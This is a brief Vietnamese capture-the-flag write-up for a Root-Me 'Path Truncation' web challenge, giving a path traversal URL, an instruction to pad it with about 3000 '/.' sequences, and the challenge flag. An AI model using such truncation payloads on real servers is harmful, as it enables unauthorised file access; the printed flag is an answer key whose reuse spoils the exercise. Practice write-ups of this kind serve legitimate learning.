# Path Truncation

Sử dụng URL sau: 

`hallenge01.root-me.org/web-serveur/ch35/index.php?page=a/../admin.html`

và thêm thật nhiều kí tự  /.  vào sau, khoảng 3000 cái.

---

### Flag:

`110V3TrUnC4T10n `